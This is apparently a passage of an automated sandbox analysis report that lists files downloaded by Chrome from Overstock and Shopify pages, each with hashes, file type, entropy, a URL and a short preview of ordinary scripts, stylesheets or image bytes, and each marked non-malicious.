                                                                                                                                                                                    SHA-512:49B939F8887B78CB035FA92080915A4DA8ACEA37600DE5BE9E82F0F8066E8AD38550986A3AC651DD4F7BFF8DA31623C78130FDD163E61A77DF60BCAE1A3C1A68
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/RageClickCapture.BAiET0lR.js
                                                                                                                                                                                    Preview:import{af as m,ag as P,ah as h,ai as c,a as s,ab as f,aj as B,N as g,ae as x,V as y,ak as E,al as S,am as b,o as k,A as l,J as R,an as W}from"./app.DfgMZONA.js";import{a as L}from"./MarketsProDisclaimer.D4Dihv-c.js";function N(){const[n]=m(),[t]=P({isPayWithPayPalButton:!0}),a=h(),e=c();return n.status==="error"||t.status==="error"?!1:a||e}const v="RTmkG",w="U4CmB",D="E4OHT",O="hLtvr",i={PayPalExpressButtonContainer:v,PayPalExpressButtonContainerRedesign:w,PayPalExpressButtonContainerWhenLoading:D,PayPalExpressButtonContainerWhenSpinnerDisplayed:O};function T({isLoading:n,isSpinnerDisplayed:t,children:a}){const e=B(),r=g("simulated");return s(y,{className:x(i.PayPalExpressButtonContainer,{[i.PayPalExpressButtonContainerRedesign]:e,[i.PayPalExpressButtonContainerWhenLoading]:n,[i.PayPalExpressButtonContainerWhenSpinnerDisplayed]:t}),inert:r||void 0,children:a})}function V(){const n=c(),[t]=P({isPayWithPayPalButton:!0}),a=s(y,{inlineAlignment:"center",children:s(E,{size:"large"})}),e=t.s
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):38134
                                                                                                                                                                                    Entropy (8bit):7.984644828914186
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:T+g1/ySSqiOb1j2m2Y8RXu6p9ilfpWmgIUNKCzC9xo+zVH6nM4Vo:7/rfbI5RXu6mfpixFC/nVr
                                                                                                                                                                                    MD5:DFDA48C2E86DA603649840406E785D84
                                                                                                                                                                                    SHA1:CF73BA6CF7BD3DCD302AA4568CD1424D5F0DBAB9
                                                                                                                                                                                    SHA-256:4BC3462E5978EE5101D41432AE44316934A6A2046F019FE0405E082D7EDE162B
                                                                                                                                                                                    SHA-512:D8CA8AF85A4D58DF752C78757A6B06E74C8EC022A68382A3BF1561F60C874FAAE77EE0DCD79CF3A17238D64028266109EA8B6656AF905DE0CBA8F300D44CC836
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-645x187_DSK_Bento01.jpg?v=1729531877&width=800
                                                                                                                                                                                    Preview:RIFF...WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ^........* ...>9..C"!...> ...7j.[......,W..."...a.~.....o....U......I.;...}....../2.....;............Y.M./......._..........o...7./......................../.?......3.W.../.o..?<~o..{;.......'.W._.~...?......\.....O.O........D...3...'....P.........E.o..t...!...?.i.o./..^..o.7.O.. .7..._...{.........?.>..F.+._./...?..c......................{...?......w..........?...?...~A}..4.....'..............o._...|..F...........o......m................q...7.................................P.....A"<.%.3.b....F....F..S[...,.$v..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1500
                                                                                                                                                                                    Entropy (8bit):6.720839258462347
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:k5TCIl/X2YlXWI2PUWRlCsgNbMw02eoVXzcXLPY6QqryFK8LTTvnm:3Il/XflYHFgNbL023VeLA6QPT7m
                                                                                                                                                                                    MD5:A04FF7861FD75F67EB31349CC6435909
                                                                                                                                                                                    SHA1:0357E0695F619D749C926DA65D826C3793D1BCA9
                                                                                                                                                                                    SHA-256:2C816252499BA1D51AA6112FA1EB7EACB023D58E8546677A0F3B8E691A8E7794
                                                                                                                                                                                    SHA-512:7BC978671E6AE502B267C1CED8F01C35C22FE3C622F5E7EC85F38875EFE62DAD5EE7ADD09FFAAAACCAF36EBA6BF1F6F59F1421BEC9F5D59EECF8AED97A1DB3A2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_9937a944-d9e3-4dd3-b05c-b7df794a1b7b.jpg?v=1729322984&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 D........*P.P.>1..B.!!.zN8 ....h.K.A0.O..q..1....qk.O.........?...o......I...\......V.r.._T_.....K..8$=.i..(....U.(.n.=a....:.0.KvW.3.N.\..d..?8r.x=.....z.f.?...Y'.g./.P<B.....4..3`.r<.F..{-...7a..`.1!...n<.....:..j[..{Fp./....F....|ky./}..TG..s.\u.....3..J.....V.7.>.,..%=8.....M.......4Y.6+.".~..=s...Y...p.g}.Fn,e..{J..!...2.a..B!.T.....F......\Vi.A.Yd.|.R.6i..e:./>...f..-......^...Hd....Fb...}15...wFS..Y...#......T...Z9h.g.:p..z..Q...>.8.....[..Q.i..h_#.E.Z.....9.Ch.@_....N]8...W..S.....B1.W....... .
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12875), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12875
                                                                                                                                                                                    Entropy (8bit):5.229604496973644
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YNQ6j5r9VBR0fUjk9Y9jnGhNPlIU628IubH6DezHkeqr17ctOo4o+KQCYqKEI0SQ:MjzQnnerg0XJrq67AcYeXVivod
                                                                                                                                                                                    MD5:F34D38C90923A3CF0A95695C11A3169B
                                                                                                                                                                                    SHA1:EDCCC3165018181940C8F5C509B596AE1F5BC635
                                                                                                                                                                                    SHA-256:EFF2497F10D71BBCD02C4372EFD22F3C7D74ED699A57073CCF912BD23CECACF4
                                                                                                                                                                                    SHA-512:EDFC5F14B2E266904E17841ED0BAE77E693DFC9CBDB2678718EB9FB166D6D6B49AF30134B925D0050F770730A2925F7CBC14096BF5B4F40262B10B46FD235CC8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/shopify/assets/storefront/load_feature-eff2497f10d71bbcd02c4372efd22f3c7d74ed699a57073ccf912bd23cecacf4.js
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t||r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55053
                                                                                                                                                                                    Entropy (8bit):7.985001129159105
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:qXkE0M6K/ZnYQ83VEAF97PQKL386h2mX1B:mkE0gZnylN7Yasq1B
                                                                                                                                                                                    MD5:2A2373FCFE3B45EB5CFE145C73A43828
                                                                                                                                                                                    SHA1:AC15E026C75F6AB9ED8DD60F5EFB70417EE0EA82
                                                                                                                                                                                    SHA-256:B071137C352ED6DE46C61F558B7A4FEB93FA6505E3692C67D8E28C53885E5FCD
                                                                                                                                                                                    SHA-512:ED472EFE8109141EB6EBB6421D902875CFC4B48A832B192E969F5A8010B63A49F075046CE28CC511C293F5F2ED41EAB62E59B56F090828870603C862151C8193
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|.....wfvUV]..+..Z(/..B..!.j...B7..\06....I.-.B.....!.^B..7.Z..;s....;.Z..%....,....<{.s...A..m(....!.../.P]..........@.0.(.*.J..b.U..*....B)U....8.......T..7j.|.4...j.:..6c.MB.F.T........k..\).L....v..`.?...X_#|...R.....vA...Yl.m...0..i.n(P.s(x.........qQ3u1.7..I..H..*._@.y. ,..<@ l+..Y...F`..=...5......P..j...l..BP..0.u-..du.\.2.....;..M...."+{...*?...[B...R %.q....=.f......M........E..'..N.p.=.}&].c+!D..-.r.J.@...P).....S... m.B...m....`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1706
                                                                                                                                                                                    Entropy (8bit):6.889942737756436
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:4Il/XflJuN4hL07WBlRKLBs0lHPt7Y/FBg:4Il/XD46LIW1K3JCg
                                                                                                                                                                                    MD5:28E4C14793EB6110B67923F6599F1FDF
                                                                                                                                                                                    SHA1:13EEF8549BE84AAAE7D925B3F923CC1326D22A2E
                                                                                                                                                                                    SHA-256:6AA56915D2C4C1B9DDED3E43173DAD83D06C028BA42258AB81A940B851D12E52
                                                                                                                                                                                    SHA-512:05978BAE53C4F7A850C6D27247B33889BA90886B4B4D96734F589A402050047869B73BA9B1790460FA6E0CA3833146A4B3B0F20BAB2F35794F6D69FD1C3E9F45
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_d0ea4804-60bb-4fd5-9298-cbdcce165ba1.jpg?v=1729325178&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.8.T ......:].%.z..J.;..s...................s.y.........^?ik]T. .....I..{.6..Y...{J...*.......ap..O.!.....t.+?......(}...~...X1.k..R....&...1W.k..J.I....&.o&.@C..I...b....y.5".!...o.......!`.:...%....<#.[H.S...]..b.g.7.-.=@_..g..#n....7Y.tn.$.iTa.>...~<-.......BB...(.~.(?#&D...V.o..v8..(.S........T.."...Lu.]...6}..?.s...0K.\......=(..wS2..:H..,.?L.....~j.y.........mx.".I...^.Xw.02.;Q@.nu...[e...i.....P3.>M.F.r....!....FO...... h.....%..v.v.0...Yb.].B.|.LV.?$.\.....J/L...e..a.Tc....._.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1024x1024, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):262162
                                                                                                                                                                                    Entropy (8bit):7.9993275053085
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:mkQrK9DPbbDm+uZKBXEEL26fnotKYnSsAUORm:m9K7Dm+oK0O4
                                                                                                                                                                                    MD5:F1262703BC9B27D9766C3C43FC3DC77E
                                                                                                                                                                                    SHA1:78D56A8EC8B51F109754CC9804D9C22B79E8F24D
                                                                                                                                                                                    SHA-256:1E2A286A6D4B541FEB3AA9F41FA13866A4A6073C162969798FA07C24E6F9093B
                                                                                                                                                                                    SHA-512:3358C206A4E4304EEFB7FA86A96C895E900E1D98A1F44549E655B3DD774DB0B52AA2182699E0955C7AF43BCE79280E655A79E3ED03499C9124A8985B07717033
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/715fb17ec6be566a86f2add317692849da8126b1/Jewelry-Armoire-Cabinet-with-Dressing-Mirror-Storage-Wallmount-Case.jpg?imwidth=900&impolicy=high
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>9..C.!..... ...........G.w..../1.....8..;...7.'.....y.{....G..?.~.{..A.O....x~.....`-e..:n..=.....C...+...'e}......w.........G....._....X...X........w.......{?......y..?.....~_}......_.....?.~....d...9.C.?......~.|....K....y....~.......7........j.......;.q.........o............x...K..._.?....k?.~.|..............O...-.....o.?..c................_.?.xQ........q.o...o.?k.?.......?v.......[......3.s./.....o..........y...3.c.....}.#............#./...............................Q..........@...W.G.....?....p.......y./.?...~W}..;.....W./._......k.'./._...?........_.......I....._._._.?......[...?.....?O.i...{............. ......<..p...9O....=.F.w....MI.jb..7.1...F./.......P.....@....?....@..Y.z.I.&.;?)7.z..s...........$...W.BN.w.@s....O...q..;...+B.}....Aq......Y.........\%.w.....-.g...h..x.){.P.Y...E.Rt+.....'...Z..>.l...:r|%C.G..(b..l...Mb...o..:.h..q+...S. ......g..+./.#,(\...&Q....7.vL....M0..Jp...7...A...x:C...Q&..d.})....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (40455)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):40532
                                                                                                                                                                                    Entropy (8bit):5.39831659265177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:sFmkuGgWzWxZTWLbAwHfJLnmITcGS5Y2xnCZqCYm:dkrgWKHqLkwtnPQGS5dnkmm
                                                                                                                                                                                    MD5:D57FA8D12FCB57E7DA82519D6EF0F2B5
                                                                                                                                                                                    SHA1:9A966866655E2C061F52D33D7498DE975114F948
                                                                                                                                                                                    SHA-256:8A328317E49399C202F9AC73B9D8694B9A6B126CDB283C6A3105D0F168B47050
                                                                                                                                                                                    SHA-512:CB4781FD73E2327A763A5CBE34DC99F3E281A150F41227A1D93F2DBE5010F5DDCEC9AC0E55E2AD6237640C086CAF03B56FA399883DBBD67205A62EE54278EADA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/stable/4.1/ui.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */(()=>{var t,e,r,n,o={58332:(t,e,r)=>{"use strict";r.d(e,{m:()=>f});var n=r(47408),o=r.n(n),i="[[PowerreviewsGlobalObject]]";function a(t){return window[i][t]}function s(t,e){try{o()(window[i],t,{configurable:!1,enumerable:!1,writable:!1,value:e})}catch(t){0}}window.hasOwnProperty(i)||o()(window,i,{configurable:!1,enumerable:!1,writable:!1,value:{}});var c="@@init",u="stable(10461)";var f={getItem:a,setItem:s,setItemVolatile:function(t,e){window[i][t]=e},initialize:function(){s("version","4.1"),s("buildVersion","10461"),s(c,u)},get isInitialized(){return a(c)===u}}},6224:(t,e,r)=>{r(66803);var n=r(10988).Object,o=t.exports=function(t,e,r){return n.defineProperty(t,e,r)};n.defineProperty.sham&&(o.sham=!0)},88600:(t,e,r)=>{r(4148),r(37708),r(99220),r(64728),r(94196),r(27660),r(31632),r(86088);var n=r(10988);t.exports=n.Promise},89648:(t,e,r)=>{var n=r(71980),o=r(61052),i=TypeError;t.exports=function(t){if(n(t))
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 56x56, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1550
                                                                                                                                                                                    Entropy (8bit):6.278413414895563
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxpYraywrRLbOHsfmaPsoKoSt4jgO8LuFnMM6:NBIl/XflVxOrayQw/djt39LuFg
                                                                                                                                                                                    MD5:5D5CB371778F1BE1435C9D6F3C1A3E64
                                                                                                                                                                                    SHA1:B10DB7749EA7D8517E828F5F777A4A99FA21191E
                                                                                                                                                                                    SHA-256:0A47C3D9BE20DDF5B894E3FF9AB3F942519724F15D2C8C9929DA0CEF6E164F81
                                                                                                                                                                                    SHA-512:FCA20B7D9EC943E5B4F9167E48247F47DE7DCD8936E097EE406C10325F7EFA30D49FB34A8C5BC9209AF2B5F2DEB826234541596F41BED1FCED1ABE98871ADA52
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................8...........8...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......8.8.....................................................................................9i.5.n..o=.'.t...05.~5s..{..V/..w..y..".]...*........4............................!1AQa.0Rq...."$3bds...........?.........L.!.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1374
                                                                                                                                                                                    Entropy (8bit):6.528840351670344
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:QTCIl/X2YlXWI2PU8yT/lTgs55dWtoA6QYw9nqOAaxjAu:1Il/XflR7lT156oAYbO0u
                                                                                                                                                                                    MD5:6B2FF90AE26AF5AB44842041767D5377
                                                                                                                                                                                    SHA1:C598E024982FAD1F587B549E1DB4BB56CD9ED42C
                                                                                                                                                                                    SHA-256:0FD551B927A7DA62E9F434834FE5F82EB5650FBEA5458077B8ECDED4070DE14A
                                                                                                                                                                                    SHA-512:447F034DA0D87749FBFAD2CB4D4D173BD02A15E50E2441969603F0F742D358EC3D7B28298662A023D77F947B295DDA448D08B961E30E16082DC84ABBC7DAB110
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_aa8f192c-5e11-4127-8f54-189fbcc3ef71.jpg?v=1729325178&width=80
                                                                                                                                                                                    Preview:RIFFV...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!!.*., ....B...{.'..`.f..~..........%.........+.c..4-..`....'M.T..s.b.].W.A..:|rb..A..s.|...k..cK.F.D...\(......";...s.e..od?.g.(Jw.Z.H..........B.A.^U...aL...3R.,P..t.L&.......d..@....$.H..$mW..gjY.....^.d.+..`......ru.........U....U..=..'.w.....k...s.}CmK.K.'w.>t..H....1R.......F.................V.[....Go.kE...?s?y.?<..s.P.[S..a...7...w.!..=...vu.3..$...R.s......mZ.r!.CG.#6....v.z.O.r..>&......U...</.4.{..@cl..;i.E..*......].t&....3~=.N8.....-C.j."..ajg.YeO..z"JZ.sk......A.SZ.f...nyf
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (25146), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):25146
                                                                                                                                                                                    Entropy (8bit):5.267249508481853
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:jf/+3YsQyoAE/rZfdWnXGM94ItmVTDrDAwibmYOMuo58G9IR9BalVVTwwbsi+weZ:A4I+XARuRbCVVJX5UrBWWJfvY6
                                                                                                                                                                                    MD5:C728D611649D157B7985BA77AFAE37C6
                                                                                                                                                                                    SHA1:9F4B355D0466B9D864A5E8CFF3784E9BB3EE070B
                                                                                                                                                                                    SHA-256:552DEAD41FB5C1A05DCC8FC792452DE80B591B2384280D59A38309400B249A00
                                                                                                                                                                                    SHA-512:BDBDF7321882E00E2318792CF950A55504A3BE2E84553FEAE0B0B8A6E9ED2436911EA01CD9572E63FA6925400C0DB03172CB6FE4440E3A09B1F4DEF164289A7F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[367],{9064:function(e){e.exports=function(e){if(null==e)throw new TypeError("Cannot destructure undefined")},e.exports.__esModule=!0,e.exports.default=e.exports},9465:function(e,n,t){"use strict";t.r(n);var a=t(8081),l=t.n(a),o=t(3645),r=t.n(o)()(l());r.push([e.id,".cl-form-field {\n align-items: center;\n background-color: #fff;\n border: 1px solid #dadcdf;\n border-radius: 4px;\n display: flex;\n flex-basis: 100%;\n position: relative;\n transition: border-color 0.15s cubic-bezier(0.4, 0, 0.2, 1);\n}\n.cl-form-field-disabled {\n background: transparent;\n opacity: 0.5;\n pointer-events: none;\n}\n.cl-form-field-focus {\n border-color: #2f3337;\n}\n.cl-form-control-error .cl-form-field {\n border-color: #c7202c;\n}\n.cl-form-floating-label {\n left: 8px;\n max-width: calc(100% - 16px);\n position: absolute;\n top: 0;\n}\n.cl-form-floating-label::before {\n background-color: rgba(255, 255, 255,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2187
                                                                                                                                                                                    Entropy (8bit):6.919227521412249
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZpd4w+Gi2pSyN3+ATGqMex7eD4KWlDMw2qOMXjJ0Je58L:NBIl/XflVxjdSy3LoBUDMAjX3+DzHULs
                                                                                                                                                                                    MD5:9E3E31BC3E8D17C9A466153BD967D5D1
                                                                                                                                                                                    SHA1:BA850B9AA91AC432EB45B33C6AFCBD63B5D87A0A
                                                                                                                                                                                    SHA-256:0C38F63CA43D73D79D2F5851974C570019389539EB0E94743887D04784D52592
                                                                                                                                                                                    SHA-512:E7A50EE6E41E7A2D9908C64D6D50DD8D71BB0C713BF9B667B0C582005ADA00D6B8B278B74CBAA01C18B5B4E69B81BBE5CD678E2958CA8D3E91D6ADAFA1222821
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`F</..X..%.F^...y7..Gc......n.TnZ.e..R.....t.Xy.......Kv.....[....U..\..C...d.$./.s@./...]....g.).t....y.....SK.......:...YoNg?NA1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):28380
                                                                                                                                                                                    Entropy (8bit):7.9718750540702565
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:ZsrixnrImeRjXwuY9JRDV7a7VP84QCP7Cut6zB:ci5ERNXwhJRDV27V8NCjCa6
                                                                                                                                                                                    MD5:F22AE1706A7B9712F01B613F5B23C570
                                                                                                                                                                                    SHA1:450E8B9B53FC75E69B8F71102C6BC161F0E3CE57
                                                                                                                                                                                    SHA-256:1AE7792BCC7255C745420D5F965291B00D8A8C6AEE3560AE27AA76B84661CB67
                                                                                                                                                                                    SHA-512:4E9AEEFA53E9C4B57D7A91D975B48EBC3436E79FD5CCC5F42A2789F261CF432CA2620329C0AD66D50A86F930AE98EA2B1526138BBB95CBE71F984186D6563BE8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/App_Desktop_Banner.png?v=1730136455&width=1200
                                                                                                                                                                                    Preview:RIFF.n..WEBPVP8X....8.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.............$...ZX....X.<...6&...}..0.<.m..I,...O$...P...!........m.Q...>9...*h..!......H8w...].A...T..R ...8..Zw/."?..4...D.......[...@bw..9E....a...A%....1@..8".j{..8t!.J...I q.#\+v..q.v..........d.....F.8....s....a..o........}...n.1.y....)......\...i$...8^............O.n..;O.5..3v..r..K....`-.D.?.N.,.Q....'..^.d....h..t.*G.j.~`..[.2.0g .Jgh.KB..n.3..H...4.L3.S$.|.2Y.,.....ap..T9...f..y0..kq.....D......w..g..'.......8...q...5.8..7.d...........UA.qp.v..P..n....h.J.$..I...$......O.Ak@%...c....iJ)....#.3.$..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):68
                                                                                                                                                                                    Entropy (8bit):4.553070246726259
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:4+vO3avEJIDYm2pvEJxCn:4+vOFuDSKqn
                                                                                                                                                                                    MD5:F47933B7D95BF214CEBD5112CBA23CF7
                                                                                                                                                                                    SHA1:A1AED97E0EC3C4CAF0EBBE22B6B73EF6E31CAA66
                                                                                                                                                                                    SHA-256:6226BE667A498CB34735B3278954663684D4FACE7C6B3B9A5B51FC74118D87D5
                                                                                                                                                                                    SHA-512:F11A2BD03EA0EC08A86736F9E0211A168A2435C22D259000A031C210052CFE8484BFF9885962DCEB05BAF0FDA0E66D6E225D7DEBF7F5C5B10A25E4261EBC9681
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DutyOptions.Bd1Z60K2.css
                                                                                                                                                                                    Preview:[dir=ltr] .LkR2o{text-align:right}[dir=rtl] .LkR2o{text-align:left}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
